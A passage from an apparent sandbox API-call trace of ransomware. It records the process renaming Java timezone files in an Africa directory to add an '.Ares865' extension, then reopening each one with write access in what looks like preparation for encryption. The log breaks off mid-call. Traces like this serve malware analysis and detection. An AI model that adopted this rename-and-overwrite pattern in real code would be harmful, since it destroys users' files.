(x86)\\java\\jre7\\lib\\zi\\africa\\khartoum.ares865"), dwFlags=0x1) returned 1 [0136.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.066] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=337) returned 1 [0136.069] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Kigali" | out: lpString1="Kigali") returned="Kigali" [0136.069] lstrlenW (lpString="Kigali") returned 6 [0136.069] lstrlenW (lpString="Ares865") returned 7 [0136.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali.Ares865") returned 61 [0136.069] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali.ares865"), dwFlags=0x1) returned 1 [0136.071] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.071] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.074] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Kinshasa" | out: lpString1="Kinshasa") returned="Kinshasa" [0136.074] lstrlenW (lpString="Kinshasa") returned 8 [0136.074] lstrlenW (lpString="Ares865") returned 7 [0136.074] lstrcmpiW (lpString1="inshasa", lpString2="Ares865") returned 1 [0136.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa.Ares865") returned 63 [0136.074] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa.ares865"), dwFlags=0x1) returned 1 [0136.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0136.079] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Lagos" | out: lpString1="Lagos") returned="Lagos" [0136.080] lstrlenW (lpString="Lagos") returned 5 [0136.080] lstrlenW (lpString="Ares865") returned 7 [0136.080] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos.Ares865") returned 60 [0136.080] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos.ares865"), dwFlags=0x1) returned 1 [0136.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.081] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.084] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Libreville" | out: lpString1="Libreville") returned="Libreville" [0136.084] lstrlenW (lpString="Libreville") returned 10 [0136.084] lstrlenW (lpString="Ares865") returned 7 [0136.084] lstrcmpiW (lpString1="reville", lpString2="Ares865") returned 1 [0136.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville.Ares865") returned 65 [0136.085] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville.ares865"), dwFlags=0x1) returned 1 [0136.086] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.086] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.089] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Lome" | out: lpString1="Lome") returned="Lome" [0136.089] lstrlenW (lpString="Lome") returned 4 [0136.089] lstrlenW (lpString="Ares865") returned 7 [0136.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome.Ares865") returned 59 [0136.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome.ares865"), dwFlags=0x1) returned 1 [0136.092] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.092] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0136.096] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Luanda" | out: lpString1="Luanda") returned="Luanda" [0136.096] lstrlenW (lpString="Luanda") returned 6 [0136.096] lstrlenW (lpString="Ares865") returned 7 [0136.096] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda.Ares865") returned 61 [0136.096] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda.ares865"), dwFlags=0x1) returned 1 [0136.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.101] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Lubumbashi" | out: lpString1="Lubumbashi") returned="Lubumbashi" [0136.101] lstrlenW (lpString="Lubumbashi") returned 10 [0136.101] lstrlenW (lpString="Ares865") returned 7 [0136.101] lstrcmpiW (lpString1="umbashi", lpString2="Ares865") returned 1 [0136.102] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi.Ares865") returned 65 [0136.102] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi.ares865"), dwFlags=0x1) returned 1 [0136.103] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.103] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0136.106] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Lusaka" | out: lpString1="Lusaka") returned="Lusaka" [0136.106] lstrlenW (lpString="Lusaka") returned 6 [0136.106] lstrlenW (lpString="Ares865") returned 7 [0136.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka.Ares865") returned 61 [0136.106] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka.ares865"), dwFlags=0x1) returned 1 [0136.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.108] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.111] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Malabo" | out: lpString1="Malabo") returned="Malabo" [0136.111] lstrlenW (lpString="Malabo") returned 6 [0136.111] lstrlenW (lpString="Ares865") returned 7 [0136.112] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo.Ares865") returned 61 [0136.112] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo.ares865"), dwFlags=0x1) returned 1 [0136.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.114] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0136.117] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Maputo" | out: lpString1="Maputo") returned="Maputo" [0136.117] lstrlenW (lpString="Maputo") returned 6 [0136.117] lstrlenW (lpString="Ares865") returned 7 [0136.118] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo.Ares865") returned 61 [0136.118] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo.ares865"), dwFlags=0x1) returned 1 [0136.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.121] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.124] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Maseru" | out: lpString1="Maseru") returned="Maseru" [0136.124] lstrlenW (lpString="Maseru") returned 6 [0136.124] lstrlenW (lpString="Ares865") returned 7 [0136.125] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru.Ares865") returned 61 [0136.125] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru.ares865"), dwFlags=0x1) returned 1 [0136.126] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0136.130] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Mbabane" | out: lpString1="Mbabane") returned="Mbabane" [0136.130] lstrlenW (lpString="Mbabane") returned 7 [0136.130] lstrlenW (lpString="Ares865") returned 7 [0136.130] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane.Ares865") returned 62 [0136.130] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane.ares865"), dwFlags=0x1) returned 1 [0136.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.135] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Mogadishu" | out: lpString1="Mogadishu") returned="Mogadishu" [0136.135] lstrlenW (lpString="Mogadishu") returned 9 [0136.135] lstrlenW (lpString="Ares865") returned 7 [0136.135] lstrcmpiW (lpString1="gadishu", lpString2="Ares865") returned 1 [0136.135] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu.Ares865") returned 64 [0136.136] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu.ares865"), dwFlags=0x1) returned 1 [0136.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.137] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73) returned 1 [0136.140] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Monrovia" | out: lpString1="Monrovia") returned="Monrovia" [0136.140] lstrlenW (lpString="Monrovia") returned 8 [0136.140] lstrlenW (lpString="Ares865") returned 7 [0136.140] lstrcmpiW (lpString1="onrovia", lpString2="Ares865") returned 1 [0136.140] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia.Ares865") returned 63 [0136.140] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia.ares865"), dwFlags=0x1) returned 1 [0136.142] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.142] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0136.145] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Nairobi" | out: lpString1="Nairobi") returned="Nairobi" [0136.145] lstrlenW (lpString="Nairobi") returned 7 [0136.145] lstrlenW (lpString="Ares865") returned 7 [0136.146] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi.Ares865") returned 62 [0136.146] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi.ares865"), dwFlags=0x1) returned 1 [0136.147] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.147] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0136.151] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Ndjamena" | out: lpString1="Ndjamena") returned="Ndjamena" [0136.151] lstrlenW (lpString="Ndjamena") returned 8 [0136.151] lstrlenW (lpString="Ares865") returned 7 [0136.151] lstrcmpiW (lpString1="djamena", lpString2="Ares865") returned 1 [0136.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena.Ares865") returned 63 [0136.151] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena.ares865"), dwFlags=0x1) returned 1 [0136.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.153] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0136.156] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Niamey" | out: lpString1="Niamey") returned="Niamey" [0136.156] lstrlenW (lpString="Niamey") returned 6 [0136.156] lstrlenW (lpString="Ares865") returned 7 [0136.157] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey.Ares865") returned 61 [0136.157] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey.ares865"), dwFlags=0x1) returned 1 [0136.158] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0136.161] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Nouakchott" | out: lpString1="Nouakchott") returned="Nouakchott" [0136.161] lstrlenW (lpString="Nouakchott") returned 10 [0136.161] lstrlenW (lpString="Ares865") returned 7 [0136.161] lstrcmpiW (lpString1="akchott", lpString2="Ares865") returned -1 [0136.162] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott.Ares865") returned 65 [0136.162] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott.ares865"), dwFlags=0x1) returned 1 [0136.163] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0136.166] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Ouagadougou" | out: lpString1="Ouagadougou") returned="Ouagadougou" [0136.166] lstrlenW (lpString="Ouagadougou") returned 11 [0136.166] lstrlenW (lpString="Ares865") returned 7 [0136.166] lstrcmpiW (lpString1="adougou", lpString2="Ares865") returned -1 [0136.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou.Ares865") returned 66 [0136.167] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou.ares865"), dwFlags=0x1) returned 1 [0136.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.171] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Porto-Novo" | out: lpString1="Porto-Novo") returned="Porto-Novo" [0136.171] lstrlenW (lpString="Porto-Novo") returned 10 [0136.171] lstrlenW (lpString="Ares865") returned 7 [0136.171] lstrcmpiW (lpString1="to-Novo", lpString2="Ares865") returned 1 [0136.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo.Ares865") returned 65 [0136.172] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo.ares865"), dwFlags=0x1) returned 1 [0136.174] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.174] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: 